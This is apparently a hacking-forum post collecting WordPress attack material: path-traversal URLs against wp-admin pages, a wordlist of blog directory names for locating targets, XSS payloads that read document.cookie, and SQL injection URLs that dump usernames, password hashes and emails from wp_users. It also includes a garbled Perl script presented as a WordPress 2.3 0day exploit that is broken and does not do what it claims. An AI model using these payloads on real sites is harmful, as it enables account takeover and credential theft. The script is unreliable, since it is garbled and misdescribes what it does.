ANTICHAT — форум по информационной безопасности, OSINT и технологиям

/wp-admin/index.php?page=\..\..\file.php
/wp-admin/index.php?page=\..\..\.htaccess
/wp-admin/link-manager.php?page=\..\..\.htaccess
/wp-admin/link-add.php?page=\..\..\.htaccess
/wp-admin/link-categories.php?page=\..\..\.htaccess
/wp-admin/link-import.php?page=\..\..\.htaccess
/wp-admin/theme-editor.php?page=\..\..\.htaccess
/wp-admin/plugin-editor.php?page=\..\..\.htaccess
/wp-admin/profile.php?page=\..\..\.htaccess
/wp-admin/users.php?page=\..\..\.htaccess
/wp-admin/options-general.php?page=\..\..\.htaccess
/wp-admin/options-writing.php?page=\..\..\.htaccess
/wp-admin/options-reading.php?page=\..\..\.htaccess
/wp-admin/options-discussion.php?page=\..\..\.htaccess
/wp-admin/options-permalink.php?page=\..\..\.htaccess
/wp-admin/options-misc.php?page=\..\..\.htaccess
/wp-admin/import.php?page=\..\..\.htaccess
/wp-admin/admin.php?page=\..\..\.htaccess
/wp-admin/bookmarklet.php?page=\..\..\.htaccess
/wp-admin/cat-js.php?page=\..\..\.htaccess
/wp-admin/inline-uploading.php?page=\..\..\.htaccess
/wp-admin/options.php?page=\..\..\.htaccess
/wp-admin/profile-update.php?page=\..\..\.htaccess
/wp-admin/sidebar.php?page=\..\..\.htaccess
/wp-admin/user-edit.php?page=\..\..\.htaccess

blogscout
lectblog
blogs
blog
blog-*
blog*
myblog
bloggt
blo
*-blog
wp
wordpress
wordpress.1
wordpress-1
wordpress_1
wordpress-*
wordpress_*
weblog
webblog
webblogs
web-blog
my-journals
myjournal
my-favorite-blog
myblog
myblogs
my-blogs
wp1-5
wp2.2
wp2-2
wp2.3
wp2-3
wp2.2
wp2.0
powered-by-wordpress
wordpress-mu
wordpress_1_5
wordpress-1.5
wordpress-1-5-1
wordpress-1.5.2	
wordpress-1.0.2
wordpress-1-2-2
wordpress_2.0_only
wordpress_2.3-series
wordpress_2.3.2
wordpress_2-3-1
Wordpress_2.4
Wordpress_2.5
Wordpress_2-5
wordpress_2.3.1
wordpress_2.0.2
wordpress_2.3
wordpress_2.0.7
Wordpress_2.4
wordpress_2.2.3
wordpress_2.1.2
WordPress_2.4
wordpress_2.3.1
WordPress_2-3
WordPress_2-2-2	
WordPress_2-3-3
wordpress_2-3
Wordpress_2-2

http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7)
OR
http://wordpress.dom/blah’onMouseOver=javascript:alert(document.cookie);// (Testing on Firebox & IE)

http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id=’/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\.htaccess

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\index.php

http://site/wp-admin/edit.php?page=wp-db-backup.
php&backup=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>

             remote sql injection exploit
###############################################################
                   

# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.

# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*      

(wp_tbv_users)

# >>> google: Fredrik Fahlstad. Version: 1.7.4.

# >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa

# >>> page : hacking.ge

###############################################################

this is example

http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*

# milw0rm.com [2008-01-19]

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl
imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
 
#use Net::DNS:Simple;
#use Math;
use Socket;
 
print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <stdin>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <stdin>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&amp;ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
PRINT "MAIL FROM: <xssworm@hotmail.com>\n";
print "RCPT TO: &lt;$target&gt;\n";
print "DATA\n”; print “Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); return(0);
# snips</xssworm@hotmail.com></stdin></stdin>

/wp-admin/theme-editor.php?page=
/wp-admin/plugins.php?page=
/wp-admin/plugin-editor.php?page=
/wp-admin/profile.php?page=
/wp-admin/users.php?page=
/wp-admin/options-general.php?page=
/wp-admin/cat-js.php?page=
/wp-admin/inline-uploading.php?page=
/wp-admin/options.php?page=
/wp-admin/profile-update.php?page=
/wp-admin/sidebar.php?page=
/wp-admin/user-edit.php?page=
/wp-admin/admin.php?page=
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/index.php?page=
/wp-admin/link-manager.php?page=
/wp-admin/link-add.php?page=
/wp-admin/link-categories.php?page=
/wp-admin/link-import.php?page=
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/greymatter.php
/wp-admin/import/livejournal.php
/wp-admin/options-writing.php?page=
/wp-admin/options-reading.php?page=
/wp-admin/options-discussion.php?page=
/wp-admin/options-permalink.php?page=
/wp-admin/options-misc.php?page=
/wp-admin/import.php?page=
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-admin/bookmarklet.php?page=